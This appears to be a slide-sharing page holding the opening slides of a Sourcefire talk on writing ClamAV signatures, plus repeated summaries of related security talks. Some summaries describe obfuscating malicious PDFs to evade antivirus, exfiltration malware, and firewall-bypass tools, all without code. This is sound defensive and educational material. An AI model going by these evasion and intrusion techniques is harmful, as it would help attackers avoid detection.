Alain Zidouemba presented on writing signatures for ClamAV. He discussed the different signature formats including .hdb, .mdb, .ndb, and .ldb. He provided examples of generating signatures using hash databases and extended signatures. He also demonstrated how to write logical signatures in .ldb format through a case study of the Worm.Godog malware. Whitelisting techniques were also covered, including adding entries to ignore specific signatures.
This is part 1 of fuzzing, an introduction to the subject. This presentation covers some of theory and thought process behind the subject, as well as an introduction to environment variable fuzzing and file format fuzzing.
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
RootedCON 2020 talk. In this talk, we showed the research about software dependencies that led us to rule the world for a day. Surprisingly, we could take control of more than 800 developer machines in less than 24 hours with the collusion of the most famous software dependency repositories... And with the "collaboraiton" of the developers ;)
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...RootedCON
The document discusses techniques for obfuscating malicious PDF files to avoid detection. It begins with an introduction to the PDF format and its object types. It then covers many obfuscation techniques like avoiding characteristic strings, splitting up JavaScript code, encoding strings and names, using uncommon filters, and introducing malformed formatting. The document also analyzes how these techniques can help files evade antivirus detection and complicate analysis by tools. It highlights the peepdf tool for its Python-based interactive PDF analysis capabilities. In conclusions, it finds that nested PDFs, compressed objects, new filters, encryption, and avoiding characteristic strings are very effective at evading detection.
The document describes a proof-of-concept malware called "evil mass storage" that can infect systems without an internet connection. It uses a custom hardware device with a micro SD card and radio frequency module to exfiltrate information from infected targets. The malware has multiple stages and can hide in encrypted sectors on the SD card or transmit data via radio. Details are provided on the prototype hardware, firmware, and future improvements planned for the project.
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
Radare was originally created as a forensics tool but now also supports bindiffing binaries. It can perform multiple search methods on files including regular expressions, strings, and hexpairs. Signatures and magic templates allow parsing unknown file formats. Scripting is supported through Vala bindings. Filesystems can be mounted and partitions analyzed. Bindiffing helps analyze differences between binaries through function and basic block matching and fingerprints. A work-in-progress graphical interface called ragui is also being built.
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]RootedCON
This document discusses hardware security and side channel attacks. It introduces side channel analysis techniques like differential power analysis and fault injection attacks. It explains how an attacker can use power traces or faults to deduce secret keys by forming hypotheses about intermediate values. Countermeasures are discussed like random delays, double checking results, and protecting code flow integrity. Developers are advised to get their systems tested since side channel vulnerabilities can be subtle.
This is part 1 of fuzzing, an introduction to the subject. This presentation covers some of theory and thought process behind the subject, as well as an introduction to environment variable fuzzing and file format fuzzing.
"A rootkits writer’s guide to defense" - Michal PurzynskiPROIDEA
Michal will take you on a journey all the way to 90’s and back, sharing the Mozilla detection framework - a systematic way to detect and hunt down threat actors. Why did we spend hours digging through some old Phrack issues? How does a blue team's member approach writing rootkits? What is better - a fail negative or a false positive? I will share answers to these questions plus a lot of alerting and evil-doing code.
RootedCON 2020 talk. In this talk, we showed the research about software dependencies that led us to rule the world for a day. Surprisingly, we could take control of more than 800 developer machines in less than 24 hours with the collusion of the most famous software dependency repositories... And with the "collaboraiton" of the developers ;)
José Miguel Esparza - Obfuscation and (non-)detection of malicious PDF files ...RootedCON
The document discusses techniques for obfuscating malicious PDF files to avoid detection. It begins with an introduction to the PDF format and its object types. It then covers many obfuscation techniques like avoiding characteristic strings, splitting up JavaScript code, encoding strings and names, using uncommon filters, and introducing malformed formatting. The document also analyzes how these techniques can help files evade antivirus detection and complicate analysis by tools. It highlights the peepdf tool for its Python-based interactive PDF analysis capabilities. In conclusions, it finds that nested PDFs, compressed objects, new filters, encryption, and avoiding characteristic strings are very effective at evading detection.
The document describes a proof-of-concept malware called "evil mass storage" that can infect systems without an internet connection. It uses a custom hardware device with a micro SD card and radio frequency module to exfiltrate information from infected targets. The malware has multiple stages and can hide in encrypted sectors on the SD card or transmit data via radio. Details are provided on the prototype hardware, firmware, and future improvements planned for the project.
Sergi Álvarez + Roi Martín - radare2: From forensics to bindiffing [RootedCON...RootedCON
Radare was originally created as a forensics tool but now also supports bindiffing binaries. It can perform multiple search methods on files including regular expressions, strings, and hexpairs. Signatures and magic templates allow parsing unknown file formats. Scripting is supported through Vala bindings. Filesystems can be mounted and partitions analyzed. Bindiffing helps analyze differences between binaries through function and basic block matching and fingerprints. A work-in-progress graphical interface called ragui is also being built.
Eloi Sanfelix - Hardware security: Side Channel Attacks [RootedCON 2011]RootedCON
This document discusses hardware security and side channel attacks. It introduces side channel analysis techniques like differential power analysis and fault injection attacks. It explains how an attacker can use power traces or faults to deduce secret keys by forming hypotheses about intermediate values. Countermeasures are discussed like random delays, double checking results, and protecting code flow integrity. Developers are advised to get their systems tested since side channel vulnerabilities can be subtle.
Sourcefire Vulnerability Research Team Labslosalamos
Today's client side attack threats represent a boon for the attacker in ways to obfuscate, evade, and hide their attacks methods. Adobe PDF, Flash, Microsoft Office documents, and Javascript require a very deep understanding of the file format, how its interpreted in the Browser, and understanding of the byte code paths that some of these formats can generate. To effectively handle some of these types of attacks it requires processing of these files multiple times to deal with compression, obfuscation, program execution, etc. This requires a new type of system to handle this type of inspection. The NRT system allows for this deep file format understanding and inspection.
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueChong-Kuan Chen
The document discusses automatic attack and defense techniques explored through DARPA's Cyber Grand Challenge (CGC) and DEFCON CTF competitions. It introduces CGC and covers topics like vulnerability discovery, fuzzing, symbolic/concolic execution, and software hardening. It describes CGC's qualification round in 2015 and final event in 2016, which was won by ForAllSecure/Mayhem. Various techniques used by competing teams are discussed, including AFL fuzzing, symbolic execution tools like S2E and Angr, and approaches that combined fuzzing and symbolic execution like Driller.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Valgrind overview: runtime memory checker and a bit more aka использование #v...Minsk Linux User Group
Sergei Trofimovich «Valgrind overview: runtime memory checker and a bit more aka использование #valgrind на селе»
Доклад на майской линуксовке MLUG 2013
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
This document discusses control hijacking attacks that aim to take control of a victim's machine by exploiting vulnerabilities in programs. It covers different types of attacks like buffer overflow attacks, integer overflow attacks, and format string vulnerabilities. These attacks work by injecting attack code or parameters to abuse vulnerabilities and modify memory to redirect the control flow. The document also discusses defenses like choosing programming languages with strong typing and automatic checks, auditing software, and adding runtime checks using techniques like stack canaries to detect exploits and prevent code execution.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
The document discusses preparing for and participating in the Defcon CTF qualifiers. It provides details on:
- Defcon CTF being one of the most prestigious CTF competitions, with only 10 teams qualifying. Teams get a FreeBSD box and must reverse, protect, and attack services. Points are earned through availability, reading other teams' keys, and overwriting keys.
- The qualifiers run from June 3rd to 6th, consisting of 5 categories with 5 progressively unlocked challenges each, over 53 non-stop hours. The scoreboard is a slow Java applet that can be bypassed by reversing the client class.
- One challenge involves a Ruby-based HTTP service with a vulnerable We
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
The document discusses several advanced persistent threats (APTs) that have targeted systems in Korea and other countries, including the LuckyCat, Heartbeat, and Flashback malware campaigns. It provides details on the attacks, malware components, command and control infrastructure, and technical analysis of the threats. The document aims to help the digital forensics community in Korea understand these sophisticated cyber espionage activities and improve defenses against similar attacks.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
Ведущий: Асука Накадзима (Asuka Nakajima)
Практика повторного использования исходного кода позволяет сократить расходы на разработку программного обеспечения. Тем не менее, если в оригинальном исходном коде кроется уязвимость, она будет перенесена и в новое приложение. Докладчик расскажет о необычном способе обнаружения «наследуемых» уязвимостей в бинарных файлах без необходимости обращаться к исходному коду или символьным файлам.
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Codemotion
This document discusses extended differential fuzzing techniques. It begins with an overview of common fuzzing and differential fuzzing. Extended differential fuzzing aims to detect more vulnerability types by analyzing outputs across different implementations, inputs, versions, and operating systems. These include path disclosure, user disclosure, error disclosure, code evaluation, command execution, network connections, and file reads. The document demonstrates examples of detecting these behaviors in PHP, Perl, Python and other languages. It promotes an open source fuzzing framework called XDiFF that automates extended differential analysis.
Let's Talk Technical: Malware Evasion and DetectionJames Haughom Jr
This is from my talk at IR18 geared around evasion techniques employed by malware, and detection methods for incident responders. I touch on everything from ransomware, to evasive fileless WMI malware. My goal for this talk was to teach defenders about the inner-workings and capabilities of malware, as well as some detection methods they may have not considered.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
This article demonstrates capabilities of the static code analysis methodology. The readers are offered to study the samples of one hundred errors found in open-source projects in C/C++. All the errors have been found with the PVS-Studio static code analyzer.
Sourcefire Vulnerability Research Team Labslosalamos
Today's client side attack threats represent a boon for the attacker in ways to obfuscate, evade, and hide their attacks methods. Adobe PDF, Flash, Microsoft Office documents, and Javascript require a very deep understanding of the file format, how its interpreted in the Browser, and understanding of the byte code paths that some of these formats can generate. To effectively handle some of these types of attacks it requires processing of these files multiple times to deal with compression, obfuscation, program execution, etc. This requires a new type of system to handle this type of inspection. The NRT system allows for this deep file format understanding and inspection.
Laura Garcia - Shodan API and Coding Skills [rooted2019]RootedCON
Laura García presents shodan-seeker, a Python tool she created for interacting with the Shodan API. The tool allows users to scan IP addresses and networks, get information on IPs from Shodan's database, detect new services, create and manage alerts, and subscribe to the streaming API. Some key features highlighted are diffing to detect new open ports, generating reports without consuming API credits, and full customization of input data, outputs, and alerts. Technical issues that may occur and how to address them are also covered.
DARPA CGC and DEFCON CTF: Automatic Attack and Defense TechniqueChong-Kuan Chen
The document discusses automatic attack and defense techniques explored through DARPA's Cyber Grand Challenge (CGC) and DEFCON CTF competitions. It introduces CGC and covers topics like vulnerability discovery, fuzzing, symbolic/concolic execution, and software hardening. It describes CGC's qualification round in 2015 and final event in 2016, which was won by ForAllSecure/Mayhem. Various techniques used by competing teams are discussed, including AFL fuzzing, symbolic execution tools like S2E and Angr, and approaches that combined fuzzing and symbolic execution like Driller.
The document discusses volatility and memory forensics. It covers topics like how volatility works on different operating systems like Linux and Windows, acquiring memory dumps, analyzing memory structures like page tables and processes, dealing with semantic gaps in raw memory, plugin development, and investigating various artifacts in memory related to authentication, passwords, encryption, and applications. The document provides information on memory forensics techniques and how volatility is used as an open-source memory forensics framework.
Valgrind overview: runtime memory checker and a bit more aka использование #v...Minsk Linux User Group
Sergei Trofimovich «Valgrind overview: runtime memory checker and a bit more aka использование #valgrind на селе»
Доклад на майской линуксовке MLUG 2013
"Revenge of The Script Kiddies: Current Day Uses of Automated Scripts by Top ...PROIDEA
Banking Trojans have been part of the financial cybercrime landscape for over a decade, causing losses measured in billions of dollars. On the flip side, the constant evolution of defenses against this type of malware has forced Trojan operators to adjust to security controls designed to keep them out. As a result, many Trojan operators have either disappeared or considerably narrowed their activity scope, but more interestingly, are using novel techniques to achieve their goals. In this talk, we will present three top malware operators active in the wild and their use of automated scripts to tackle their challenges: The notorious Gozi (ISFB) malware used to run its own executable files. Nowadays, it avoids storing malicious payloads on disk and instead, writes a Powershell script to the Windows registry and executes it using a special regex-based run-key. Ramnit, a dated foe that focuses on UK banks, encrypts its payload using a Windows API function with a device-unique key. In every system reboot, it decrypts the payload in-memory and runs it with a Visual Basic script that runs Powershell. This allows Ramnit to avoid running a detectable, executable file as it used to do in the past. BackSwap is a new banking Trojan that attacks financial institutions in Spain. Its dropper is a JavaScript Encoded (JSE) file. When decoded, the dropper results in a 30k lines-of-code script which downloads a binary sample from a remote Command-and-Control server. Together with our audience, we will walk through the research process and share our findings along with our (sometimes) quick-and-dirty solutions. We aim to enhance our participants’ knowledge of today’s bankers and help them get deeper into current-day scripting-related techniques cybercriminals use.
This document discusses control hijacking attacks that aim to take control of a victim's machine by exploiting vulnerabilities in programs. It covers different types of attacks like buffer overflow attacks, integer overflow attacks, and format string vulnerabilities. These attacks work by injecting attack code or parameters to abuse vulnerabilities and modify memory to redirect the control flow. The document also discusses defenses like choosing programming languages with strong typing and automatic checks, auditing software, and adding runtime checks using techniques like stack canaries to detect exploits and prevent code execution.
The Art of Exploiting Unconventional Use-after-free Bugs in Android Kernel by...CODE BLUE
In this talk, we are going to disclose two unconventional Use-after-free kernel bugs on Android we found last year, and introduce the new techniques we used to make these exploits 100% reliable.
The first bug is CVE-2017-0403, which we used to gain root privilege on almost all devices shipped with 3.10 or earlier Linux kernel last year. So far more than 14 million users have successfully rooted their smartphones with this exploit. With this vulnerability, an attacker only can overwrite the freed object at a fixed offset with a pointer to object itself. How to achieve kernel code execution with this bug can be very challenging.To solve the problem, we propose a new method which is using iovec to re-fill the freed object and compromising the pipe subsystem in kernel.In this way we can covert this unusual memory corruption to arbitrary kernel memory overwriting.
The second bug is CVE-2016-6787. The bug is an UAF due to race condition, may corrupt a critical kernel structure, and lead to the kernel crash when scheduler switched context back to attacker's process. So we'll introduce a way to freeze the attacker's process soon after UAF happened ,stop kernel from crashing, and make the exploit reliable.
In summary, this presentation gives out the new techniques of exploiting use-after-free bugs we just found in Android kernel. The ideas of exploitation are fresh, detail of bugs is also never discussed before.
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
In theory, post-exploitation after having remote access is easy. Also in theory, there is no difference between theory and practice. In practice, there is. Imagine a scenario, where the hacker/penetration-tester has deployed a malware on a user's workstation, but the target information is on a secure server accessed via two-factor authentication, with screen access only (e.g. RDP, Citrix, etc.) On top of that, the server runs application white-listing, and only the inbound port to the screen server (e.g. 3389) is allowed through the hardware firewall. But you also need persistent interactive C&C communication (e.g. Netcat, Meterpreter, RAT) to this server through the user's workstation.
I developed (and will publish) two tools that help the community in these situations. The first tool can drop malware to the server through the screen while the user is logged in. The second tool can help to circumvent the hardware firewall after one can execute code on the server with admin privileges (using a signed kernel driver). My tools have been tested against Windows server 2012 and Windows 8, and they work with RDP or other remote desktops (e.g. Citrix). The number of problems one can solve with them are endless, e.g., communicating with bind-shell on webserver behind restricted DMZ. Beware, live demo and fun included!
The document discusses preparing for and participating in the Defcon CTF qualifiers. It provides details on:
- Defcon CTF being one of the most prestigious CTF competitions, with only 10 teams qualifying. Teams get a FreeBSD box and must reverse, protect, and attack services. Points are earned through availability, reading other teams' keys, and overwriting keys.
- The qualifiers run from June 3rd to 6th, consisting of 5 categories with 5 progressively unlocked challenges each, over 53 non-stop hours. The scoreboard is a slow Java applet that can be bypassed by reversing the client class.
- One challenge involves a Ruby-based HTTP service with a vulnerable We
This document summarizes a three-part challenge involving cracking a MIPS binary, exploiting a Python/XXE vulnerability in a web application, and decrypting messages from a SecureDrop-like system. The MIPS binary is cracked by inverting its password checking algorithm. The web app is exploited via XXE to retrieve files containing an admin URL and view state details. Python code is modified at runtime to decrypt an AES key and access a "secret.key" file. This key reveals a tarball containing a SecureDrop implementation. A buffer overflow in SecDrop's service is used to run shellcode. Timing attacks via the CPU cache are then used to retrieve the private RSA key and decrypt messages stored by the SecureDrop-
The document discusses several advanced persistent threats (APTs) that have targeted systems in Korea and other countries, including the LuckyCat, Heartbeat, and Flashback malware campaigns. It provides details on the attacks, malware components, command and control infrastructure, and technical analysis of the threats. The document aims to help the digital forensics community in Korea understand these sophisticated cyber espionage activities and improve defenses against similar attacks.
"Into the Fog The Return of ICEFOG APT" - Chi en (Ashley) ShenPROIDEA
Chi-en Shen (Ashley) is a security researcher at FireEye, where she focuses on threat intelligence research. She specializes in threat hunting, malware analysis, reverse engineering, and targeted attacks research. Prior to FireEye, Ashley helped found Team T5, a threat research security company where she also works as a threat analyst. For supporting women in InfoSec, Ashley co-founded “HITCON GIRLS” – the first security community for women in Taiwan. Ashley is also a regular speaker at global security conferences, including Black Hat Europe, Black Hat Asia, FIRST, HITB GSEC, CODE BLUE, Troopers, HITCON and VXCON. Ashley also serves as a member of the Black Hat Asia review board where she evaluates research for briefings and training.
Powershella lubią admini, programiści, a najbardziej hakerzy. Będąc natywną powłoką systemów Windows nie rzuca się w oczy, jednocześnie dając ogromne możliwości ofensywne. Podczas prelekcji Paweł zaprezentuje zarówno skuteczne one-linery jak i wielolinijkowe skrypty, które mogą siać spustoszenie w nieprzygotowanej organizacji. Pojawią się ciekawe kanały C2, malware napisany w całości w Powershellu, wyszukiwanie i eksploitacja słabo skonfigurowanych serwerów MSSQL etc.100% mięsa.
Если нашлась одна ошибка — есть и другие. Один способ выявить «наследуемые» у...Positive Hack Days
Ведущий: Асука Накадзима (Asuka Nakajima)
Практика повторного использования исходного кода позволяет сократить расходы на разработку программного обеспечения. Тем не менее, если в оригинальном исходном коде кроется уязвимость, она будет перенесена и в новое приложение. Докладчик расскажет о необычном способе обнаружения «наследуемых» уязвимостей в бинарных файлах без необходимости обращаться к исходному коду или символьным файлам.
Fernando Arnaboldi - Exposing Hidden Exploitable Behaviors Using Extended Dif...Codemotion
This document discusses extended differential fuzzing techniques. It begins with an overview of common fuzzing and differential fuzzing. Extended differential fuzzing aims to detect more vulnerability types by analyzing outputs across different implementations, inputs, versions, and operating systems. These include path disclosure, user disclosure, error disclosure, code evaluation, command execution, network connections, and file reads. The document demonstrates examples of detecting these behaviors in PHP, Perl, Python and other languages. It promotes an open source fuzzing framework called XDiFF that automates extended differential analysis.
Let's Talk Technical: Malware Evasion and DetectionJames Haughom Jr
This is from my talk at IR18 geared around evasion techniques employed by malware, and detection methods for incident responders. I touch on everything from ransomware, to evasive fileless WMI malware. My goal for this talk was to teach defenders about the inner-workings and capabilities of malware, as well as some detection methods they may have not considered.
The document describes experiments related to system security and digital forensics.
The first experiment involves using static code analysis tools like RATS and Flawfinder to analyze code samples for vulnerabilities. The second experiment describes installing and using the vulnerability scanner Nessus to scan systems for known vulnerabilities.
The third experiment explores using the website copier HTTrack to download a website from the internet to a local directory while preserving the directory structure and links. The fourth experiment demonstrates configuring router security using passwords and access lists on Cisco Packet Tracer to filter traffic between VLANs and networks.
This article demonstrates capabilities of the static code analysis methodology. The readers are offered to study the samples of one hundred errors found in open-source projects in C/C++. All the errors have been found with the PVS-Studio static code analyzer.
100 bugs in Open Source C/C++ projects Andrey Karpov
This article demonstrates capabilities of the static code analysis methodology. The readers are offered to study the samples of one hundred errors found in open-source projects in C/C++.
Formbook is a malware that steals passwords and harvests credentials by injecting code into targeted applications like web browsers, mail clients, and IM apps. It uses various anti-analysis techniques like manually mapping ntdll.dll and checking for debuggers. Formbook employs process hollowing to inject its code into explorer.exe and other processes, then sets up inline userland hooks to intercept function calls and harvest passwords.
The document discusses practical incident response in heterogeneous environments and overcoming limitations of traditional approaches. It proposes utilizing intelligence-driven investigation and actionable IOCs to more flexibly shape the triage process across different operating systems. Examples are provided of using software fingerprinting and debugging symbols to attribute malware and build structured knowledge bases of attackers.
I'm take picture from here and there by goggling not mentioning all source please let me know if anyone has any objection. This presentation was presented in IUT CTF G3t R00t
This document discusses tools for static analysis of files, including ClamAV and YARA. ClamAV is an open-source antivirus engine that uses signatures to detect malware. Signatures can include strings, hashes, and byte patterns. YARA allows for more flexible identification of malware through rules that can detect strings, regular expressions, and byte patterns. Examples of ClamAV and YARA signatures are provided.
The document discusses the analysis of an attack involving a compromised website containing a PHP webshell. Additional artifacts found included an initial SQL injection, a China Chopper webshell, and a Golang-coded ss.exe backdoor. The attacker used a vulnerability in Sandboxie to evade detection and execute a debugsrv.exe trojan. Yara rules were provided to detect related malware samples. The investigation mapped the attacker's lateral movement and a remediation plan was implemented over 35 days.
Media parsing is known as one of the weakest components of every consumer system. It often operates complex data structures in the most performant way possible, which is at odds with security requirements, such as attack surface minimization, compartmentalization, and privilege separation. Compared to other operating systems, video decoding on MacOS/iOS is an interesting case for two different reasons. First, instead of running in usermode, a considerable portion of format parsing is implemented in a kernel extension called AppleAVD, exposing the kernel to additional remote attack vectors. Second, recent anonymous reports suggest that AppleAVD may have been exploited in the wild. Our talk investigates AppleAVD kernel extension in-depth, covering video decoding subsystem internals, analysis of vulnerabilities, and ways to exploit them.
Forensics perspective ERFA-møde marts 2017J Hartig
This document provides an overview of analyzing banker trojans from a digital forensics perspective. It discusses identifying how banker trojans persist on systems, how they are initially installed, and techniques for determining the timeline of infection. Free tools are presented for collecting artifacts like files, registry entries, and events for analysis. A case study of the Carbanak and Dridex banker trojans is briefly described. Finally, commercial incident response tools are summarized, including automated collection and analysis capabilities as well as reporting and data sharing functions.
Is NetTraveler APT managed by PLA Military Camp in Lanzhou [China] ???.Rahul Sasi
In 2014 the actors behind global cyber espionage campaign “Operation NetTraveler” celebrate ten years of activity. NetTraveler has targeted more than 350 high-profile victims in 40 countries. So it is high time we make our research public .We were able to attribute Netravler to PLA[People liberation Army] military camp in Lanzhou. We provide our analysis in the form of a PPT slide.
Part of this presentation is based on research published in 2015, which was demonstrated the increasing spread of malware binaries mach-o and how to analyze the type of these binary. In this presentation, we will explain with more detail the structure of Binary using debuggers tools and reverse engineering techniques.The knowledge gained will be useful from analysis of malware as also for challenges type crackmes on CTFs.
Ricardo L0gan will be giving a presentation on reversing Mach-O files at the Hackers to Hackers Conference (H2HC). The presentation will include an overview of the Mach-O file format used in Mac OS X and iOS, demonstrations of reversing sample crackmes and malware, and techniques for tricking and bypassing reverse engineering defenses. It will cover topics such as disassembly, debugging, and static/dynamic analysis tools useful for Mach-O reversing.
Penetrating Windows 8 with syringe utilityIOSR Journals
This document discusses penetrating Windows 8 remotely using Metasploit framework and syringe utility. It begins with an introduction to penetration testing and Windows 8 security. It then describes using Metasploit to generate a payload, encoding it to evade detection, and injecting it into a Windows 8 system using syringe. This allows establishing a meterpreter session and compromising the system by migrating processes and accessing the C drive. It concludes that Windows 8 has strong security but syringe injections allow compromising it, and more exploits could be found to enhance efficacy.
The PVS-Studio developers' team has carried out comparison of the own static code analyzer PVS-Studio with the open-source Cppcheck static code analyzer. As a material for comparison, the source codes of the three open-source projects by id Software were chosen: Doom 3, Quake 3: Arena, Wolfenstein: Enemy Territory. The article describes the comparison methodology and lists of detected errors. The conclusions section at the end of the article contains "non-conclusions" actually, as we consciously avoid drawing any conclusions: you can reproduce our comparison and draw your own ones.
This document contains information about an industrial control systems (ICS) security group including their goals, objectives, and vulnerabilities they focus on. It lists the members of the group and provides information on typical ICS network configurations, protocols used including Modbus, Profinet, DNP3, and others. It also discusses tools and scripts for assessing these protocols and mentions past vulnerabilities the group has found.
PANDEMONIUM: Automated Identification of Cryptographic Algorithms using Dynam...CODE BLUE
Malware utilize many cryptographic algorithms.
To fight against malware, analysts have to reveal details on malware activities.
Accordingly, it is important to identify cryptographic algorithms used in malware.
In this track, I propose a faster and extensible method to automatically detect known cryptographic algorithms in malware using dynamic binary instrumentation and fuzzy hashing.
Search for Vulnerabilities Using Static Code AnalysisAndrey Karpov
Vulnerabilities are the same things as common errors. Why do we distinguish them? Do this, if you want to earn more money. CWE - Common Weakness Enumeration. CVE - Common Vulnerabilities and Exposures. Now using Valgrind you're searching not for a memory leak, but for a denial of service.
An Experiment with Checking the glibc LibraryAndrey Karpov
We have recently carried out an experiment with checking the glibc library by PVS-Studio. Its purpose was to study how good our analyzer is at checking Linux-projects. The basic conclusion is, not much good yet. Non-standard extensions used in such projects make the analyzer generate a huge pile of false positives. However, we have found some interesting bugs.
A school project. How well does Metasploit encode its executables? I'm putting it to the test against 10 different antivirus programs. This is just the proposal; the finished version should be done in a month or so.
2. About the presenter
Alain Zidouemba
• VRT Research Engineer for over a year
• Primary responsibilities:
• Malware research & signatures generation – ClamAV
• Vulnerability research & rules generation – Snort
• Before Sourcefire: Anti-Malware Research Engineer
2
3. Outline
What is ClamAV
Where to get ClamAV
Different ClamAV signature formats:
• .hdb
• .mdb
• .ndb
• .ldb
Whitelisting
Q&A
3
5. What is ClamAV?
Clam AntiVirus (ClamAV) is an open source
(GPL) anti-virus toolkit for UNIX, designed
especially for e-mail scanning on mail gateways
Provides a number of utilities including:
• A flexible and scalable multi-threaded daemon
(clamd)
• A command line scanner (clamscan)
• An advanced tool for automatic database updates
(freshclam)
• Sigtool – more later
5
6. Where can I get ClamAV from?
Latest stable release: ClamAV 0.94.2
• http://www.clamav.net/download/sources
Most popular UNIX operating systems are
supported:
• GNU/Linux, Solaris, FreeBSD, OpenBSD, Mac OS X
Up-to-date list of binary packages is available
at our website:
• http://clamav.net/download/packages
6
7. Why learn how to write sigs?
I thought Sourcefire released signatures
updates several times a day!
7
